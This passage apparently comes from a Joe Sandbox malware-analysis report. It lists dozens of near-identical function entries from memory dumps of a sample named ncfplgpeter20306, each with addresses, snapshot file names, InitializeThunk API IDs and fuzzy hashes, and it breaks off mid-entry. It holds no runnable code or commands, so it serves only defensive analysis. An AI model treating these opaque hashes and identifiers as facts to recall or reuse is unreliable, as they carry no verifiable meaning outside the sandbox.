                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 809d2eb967ec28153eb238e5ebd28553e1e3153d215270e8ab881b74b961d841
                                                  • Instruction ID: 197be997b73312d6fce65ef81197979e98e6a2f0a8888aff6938f1768aeb5b5f
                                                  • Opcode Fuzzy Hash: 809d2eb967ec28153eb238e5ebd28553e1e3153d215270e8ab881b74b961d841
                                                  • Instruction Fuzzy Hash: 85C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF51
                                                  Function 008D34C8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2a9c78fa89381e29d57ea93d8a95c2311a5037f7e75da98fa377b9db8463b528
                                                  • Instruction ID: 549a087bc13baf8fba1cc82ab2ff0b7ddbf386261258aa20fa5895da737eb0c4
                                                  • Opcode Fuzzy Hash: 2a9c78fa89381e29d57ea93d8a95c2311a5037f7e75da98fa377b9db8463b528
                                                  • Instruction Fuzzy Hash: 41C1CE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF51
                                                  Function 008DAEC0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 14de366d20b2d31f066e870a6ffc2fcf732221b9b7de33a3effce7490782e17c
                                                  • Instruction ID: b41f4f634025db7ffe2df1c71b0ca6b1f08dd389abc321d58fa1fcfde64f6437
                                                  • Opcode Fuzzy Hash: 14de366d20b2d31f066e870a6ffc2fcf732221b9b7de33a3effce7490782e17c
                                                  • Instruction Fuzzy Hash: 8BC1BD74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Function 008DD5D8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f6766b9cac8f63f8e671942824cec5002205b0f9565371b68e2c2128effbc2ed
                                                  • Instruction ID: eda67e8c57811b6fa4bc3daaf453f6611378062ca59e05911739f3046e061f14
                                                  • Opcode Fuzzy Hash: f6766b9cac8f63f8e671942824cec5002205b0f9565371b68e2c2128effbc2ed
                                                  • Instruction Fuzzy Hash: CBC1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Function 008D4ED8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 089aee29ba004ca6e12c1c3232ef41dd46bb754dd495132f2cdc742674a98bc6
                                                  • Instruction ID: d992879d8c25a58dfe4b50726e6f395fe481a27ad1e9951d0dc5f8a4bb80d9f5
                                                  • Opcode Fuzzy Hash: 089aee29ba004ca6e12c1c3232ef41dd46bb754dd495132f2cdc742674a98bc6
                                                  • Instruction Fuzzy Hash: 6AC1BF74E00218CFDB54DFA5C994B9DBBB2FF89300F2081AAD409AB355DB359A85CF50
                                                  Function 008D41D0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9e29dcdb44b0e14794cf43cabf9d7150e2f31b4a56c74fe85cef528094a18e31
                                                  • Instruction ID: 59aeceace17f5fd4208ae3f225d3ddc9286c45f04f8fcac930af93417167d50d
                                                  • Opcode Fuzzy Hash: 9e29dcdb44b0e14794cf43cabf9d7150e2f31b4a56c74fe85cef528094a18e31
                                                  • Instruction Fuzzy Hash: FCC1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355DB359A81CF50
                                                  Function 008DC8D0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c383d0abab400aaedbcb10aedc637e1edf37d602e6c9e1f7db67ffc828242e66
                                                  • Instruction ID: 090783e8763dc8a3602d0a6693c69ced861943e80a260db9fb9b539287e989d6
                                                  • Opcode Fuzzy Hash: c383d0abab400aaedbcb10aedc637e1edf37d602e6c9e1f7db67ffc828242e66
                                                  • Instruction Fuzzy Hash: 1EC1BF74E01218CFDB54DFA5C994B9DBBB2FB89300F2481AAD809AB355DB359E81CF50
                                                  Function 008D68E8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c531af2887c71760b66d23536f4fdab14e6a1ec4618038f0d2df4e0229574b98
                                                  • Instruction ID: 6ad832b63953f267f7080a27978d9bbf34cbe77c25cabcb158bc6287a8d6dbaf
                                                  • Opcode Fuzzy Hash: c531af2887c71760b66d23536f4fdab14e6a1ec4618038f0d2df4e0229574b98
                                                  • Instruction Fuzzy Hash: CEC1AE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD409AB355EB359A85CF50
                                                  Function 008D5BE0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 57b442fe10c8e5b095aad884a520aa3da1cafd10e1f234ad5c183f225574384b
                                                  • Instruction ID: a419c0ac23b400b620d7b3e87f05af147bc633bf96f1254e1f6e2076dfda9f2b
                                                  • Opcode Fuzzy Hash: 57b442fe10c8e5b095aad884a520aa3da1cafd10e1f234ad5c183f225574384b
                                                  • Instruction Fuzzy Hash: 2AC1AE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359A85CF50
                                                  Function 008D82F8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6b252b5d4d8175a7951ee288c4d8e8fe929a1b82c6d0ea2f3386d22d7ce6526c
                                                  • Instruction ID: 51ac2e911c0498d754fa7b89d43de04fa03a1eb477818fa24624e7e904d624ec
                                                  • Opcode Fuzzy Hash: 6b252b5d4d8175a7951ee288c4d8e8fe929a1b82c6d0ea2f3386d22d7ce6526c
                                                  • Instruction Fuzzy Hash: 0BC1AD74E00218CFDB54DFA5C994BADBBB2FB89300F2085AAD409AB355DB359A81CF51
                                                  Function 008D75F0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 490351a3a520a4dce7d98c69753b775e0906ea3da0ba3d33d3fe388208bd5707
                                                  • Instruction ID: 05027cba4372e725430a1e0ffdd8b63ad351ae28f60cb614e8a78cbd2340d929
                                                  • Opcode Fuzzy Hash: 490351a3a520a4dce7d98c69753b775e0906ea3da0ba3d33d3fe388208bd5707
                                                  • Instruction Fuzzy Hash: 2DC1AF74E00218CFDB54DFA5C954B9DBBB2FB89300F2085AAD809AB355EB359E81CF50
                                                  Function 008D9000 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51e5b0d6e466c46a1ef298b976ddb6c6d7c7a233f44f30ea5a59a68772c84207
                                                  • Instruction ID: f5700b88d977cf3342701392cec8d82a14765608c94acac4b5cc185e2f933ef2
                                                  • Opcode Fuzzy Hash: 51e5b0d6e466c46a1ef298b976ddb6c6d7c7a233f44f30ea5a59a68772c84207
                                                  • Instruction Fuzzy Hash: B6C1AF74E00218CFDB54DFA5C994B9DBBB2FF89300F1485AAD409AB355DB359A81CF50
                                                  Function 008DB318 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 94d145e0988d2b07993f276646722775fb3ba23543367ee8bb497bf70a7732f0
                                                  • Instruction ID: 8ad916458a18b4f79d2709d40ab7b3a377398ac1b579bf31cacfaad589f4d268
                                                  • Opcode Fuzzy Hash: 94d145e0988d2b07993f276646722775fb3ba23543367ee8bb497bf70a7732f0
                                                  • Instruction Fuzzy Hash: 09C1AD74E00218CFDB54DFA5C994B9DBBB2FB89300F2485AAD809AB355DB359A81CF50
                                                  Function 008DCD28 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7767fb478e29f48ae0d7bf983a90d46fa095f4ed4e0654c028a4ad80b80fa5c7
                                                  • Instruction ID: ff193b3d20dd73fe67ae9b355daeb3768252ca56e7b6d387bffd17dc81b1322f
                                                  • Opcode Fuzzy Hash: 7767fb478e29f48ae0d7bf983a90d46fa095f4ed4e0654c028a4ad80b80fa5c7
                                                  • Instruction Fuzzy Hash: 63C1BE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359E85CF50
                                                  Function 008D4628 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1789dc7e0c8abe7b9925e968b43584abf38ff0fe43a9872dbc14fd24f415ce3
                                                  • Instruction ID: b85ca213ae1bbe7f8678bd39c31ac672bf59602e224c8d7b90073932bbe1636e
                                                  • Opcode Fuzzy Hash: d1789dc7e0c8abe7b9925e968b43584abf38ff0fe43a9872dbc14fd24f415ce3
                                                  • Instruction Fuzzy Hash: 84C1AD74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355DB359A81CF50
                                                  Function 008DC020 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8da196e07a09c96c23c69f918f843214a2cee15b70c5649517b745444b898b75
                                                  • Instruction ID: 84071d76acc29630c37106f2f8b5594307ae386a80db1b1d84e11ce24e8406d3
                                                  • Opcode Fuzzy Hash: 8da196e07a09c96c23c69f918f843214a2cee15b70c5649517b745444b898b75
                                                  • Instruction Fuzzy Hash: D6C1AF74E00218CFDB54DFA5C954B9DBBB2FF89300F1485AAD409AB355DB359A81CF50
                                                  Function 008D3920 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a134ea67d89ab68bb8ee410ba1a66591b9e31ddf92a41e27bb69a026bd928e56
                                                  • Instruction ID: 7f57fb5774101765b2f788df19eaac454e0e1ab7921cccdc4c6936b992829414
                                                  • Opcode Fuzzy Hash: a134ea67d89ab68bb8ee410ba1a66591b9e31ddf92a41e27bb69a026bd928e56
                                                  • Instruction Fuzzy Hash: 80C1BD74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359A81CF51
                                                  Function 008D6038 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 778ff109c83543f294c0b1c7bd270ccf0fc6fd506cf40d3144b06f3ca8cc0848
                                                  • Instruction ID: e99f84bec78e1bc550e2f6918974e8d700f40bbd6d5be509f418db0846a2eaf4
                                                  • Opcode Fuzzy Hash: 778ff109c83543f294c0b1c7bd270ccf0fc6fd506cf40d3144b06f3ca8cc0848
                                                  • Instruction Fuzzy Hash: 03C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355EB359A85CF50
                                                  Function 008D5330 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7df949d0c5471d3a3ceb58c5bbd895695c872083390e599ec88674611ffe6f1a
                                                  • Instruction ID: 77473de3d0ed0cb63a478f05dfb4009092a1848d0abe020d78f4154eb959ea6a
                                                  • Opcode Fuzzy Hash: 7df949d0c5471d3a3ceb58c5bbd895695c872083390e599ec88674611ffe6f1a
                                                  • Instruction Fuzzy Hash: 51C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355DB359A81CF50
                                                  Function 008DDA30 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d4d327016af06550fff5545d548e22385ec8231593cebd0996513f9873a44795
                                                  • Instruction ID: 5375120749f76b4d9781a81571ea48dfb0fb199c59ed3d08c98d8d0d5cf61a1b
                                                  • Opcode Fuzzy Hash: d4d327016af06550fff5545d548e22385ec8231593cebd0996513f9873a44795
                                                  • Instruction Fuzzy Hash: 76C1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355DB359A81CF50
                                                  Function 008D7A48 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 092fd86a2f440c77f5b82e57e516dca46151fed71899d9a34bf6eeaf87707af2
                                                  • Instruction ID: 75fdd1e580574f6763969b451da37a3e9acd7dd635ffa3383769999f59ce276d
                                                  • Opcode Fuzzy Hash: 092fd86a2f440c77f5b82e57e516dca46151fed71899d9a34bf6eeaf87707af2
                                                  • Instruction Fuzzy Hash: FCC1AE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD409AB355EB359E81CF50
                                                  Function 008D6D40 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c5bc9886dc61cc285fc2baeccb4896ee4cb773db9faf53663365ed41453c6488
                                                  • Instruction ID: ebc25e2443d6914448ee0f8d9395ae8a62a3ce31e63b29f14e6a724c4e4e1923
                                                  • Opcode Fuzzy Hash: c5bc9886dc61cc285fc2baeccb4896ee4cb773db9faf53663365ed41453c6488
                                                  • Instruction Fuzzy Hash: F0C1AF74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355EB359A81CF50
                                                  Function 008D9458 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: add872c62a897b95d19d69bee983116d72e4b088e517603def654f2db6e44191
                                                  • Instruction ID: b55751ceb8adf462ae18ee1bdd9becf71512e7bbc9b24118bcd5aed059e37e37
                                                  • Opcode Fuzzy Hash: add872c62a897b95d19d69bee983116d72e4b088e517603def654f2db6e44191
                                                  • Instruction Fuzzy Hash: 61C1AE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355DB359A85CF50
                                                  Function 008D8750 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 648f84f8ae89a66c89560b43e64f4239b39c3858058d566f3a4cf7db6b05aed0
                                                  • Instruction ID: c41d185ac2324bfcbc8539dcd37748dab048c2a444c28b5f40521d728000e84c
                                                  • Opcode Fuzzy Hash: 648f84f8ae89a66c89560b43e64f4239b39c3858058d566f3a4cf7db6b05aed0
                                                  • Instruction Fuzzy Hash: 26C1BE74E00218CFDB54DFA5C994BADBBB2FF89300F2085AAD409AB355DB359A81CF51
                                                  Function 008DAA68 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4ea82c531c3449bc7d7fb65fe38030a89b7f507fe1c9abf6cba87efefd5d5ed5
                                                  • Instruction ID: 9826fdbce6a4f94b606ae18f7a60fb7854054f00c75755df5e232388d940ae71
                                                  • Opcode Fuzzy Hash: 4ea82c531c3449bc7d7fb65fe38030a89b7f507fe1c9abf6cba87efefd5d5ed5
                                                  • Instruction Fuzzy Hash: 43C1AD74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD409AB395DB359E81CF51
                                                  Function 008D3D78 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7e8b6fe8f75c9de6e46bf59bd10b87d9244f1f3099aff81a89216b9fdf36d8e0
                                                  • Instruction ID: dfc1cafb78b9fd2538bafec3ee95b352dbe35a581c157dd37fc92920ca6e7c15
                                                  • Opcode Fuzzy Hash: 7e8b6fe8f75c9de6e46bf59bd10b87d9244f1f3099aff81a89216b9fdf36d8e0
                                                  • Instruction Fuzzy Hash: 3CC1BE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD409AB395DB359A81CF51
                                                  Function 008DC478 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0410eaf2d705b22d42304926f1d5f580f6521bd24c16d47c59d6a80074940dc3
                                                  • Instruction ID: b9746b4cc90602e68241d4430de749c8f35e96f6110907f5671a0dc1a5d1f157
                                                  • Opcode Fuzzy Hash: 0410eaf2d705b22d42304926f1d5f580f6521bd24c16d47c59d6a80074940dc3
                                                  • Instruction Fuzzy Hash: A7C1AD74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355DB359A81CF50
                                                  Function 008DB770 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b421a9a63c49ec68ec00766386bf4201b080e53b87bdd17a5934dac5257ee2fe
                                                  • Instruction ID: abe821f981beb40237c9ed0bac10117f574425edcc3c029c7ea32484a1bd278f
                                                  • Opcode Fuzzy Hash: b421a9a63c49ec68ec00766386bf4201b080e53b87bdd17a5934dac5257ee2fe
                                                  • Instruction Fuzzy Hash: F1C1BD74E00218CFDB54DFA5C994B9DBBB2FB89300F2485AAD809AB355DB359A81CF50
                                                  Function 008D3070 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3bdd6ce3b86c37794e7d5ccf77715d2d4a8b4b105db54a7d5cac72406d8f3b66
                                                  • Instruction ID: b9a4bc50b448a51f1dd3dd5589b746d0b00846289edcb1240010bc6c3d96477c
                                                  • Opcode Fuzzy Hash: 3bdd6ce3b86c37794e7d5ccf77715d2d4a8b4b105db54a7d5cac72406d8f3b66
                                                  • Instruction Fuzzy Hash: F8C1CD74E00218CFDB14DFA5C994B9DBBB2FB89300F2081AAD808AB355DB349E81CF51
                                                  Function 00713BF8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: daf67f91496df8da16f10824165b3026ae7d445b2261096237166dafd242b2f1
                                                  • Instruction ID: 8378874d09fe8df17e98e87217159ff05e8ce4d96bb7820bd0090558066d8c7a
                                                  • Opcode Fuzzy Hash: daf67f91496df8da16f10824165b3026ae7d445b2261096237166dafd242b2f1
                                                  • Instruction Fuzzy Hash: 80C1BF74E00218CFDB54DFA5C994B9DBBB2BF89300F2085A9D409AB395DB359E85CF50
                                                  Function 00945F28 Relevance: .3, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14d1713e8f3325d2e1deba3374e049b722ec2d37c2f4a3bb9cc03f83e93c847e
                                                  • Instruction ID: 8d1e796ce7e13909cd9fe85b287504a88857422c52f60d0cc26e08e009f1d9e5
                                                  • Opcode Fuzzy Hash: 14d1713e8f3325d2e1deba3374e049b722ec2d37c2f4a3bb9cc03f83e93c847e
                                                  • Instruction Fuzzy Hash: EC916D75D00244CFD714AFA0D95C7EEBBB6EB4A306F10541AD1027B2E8CB785A88CF59
                                                  Function 00945F38 Relevance: .2, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
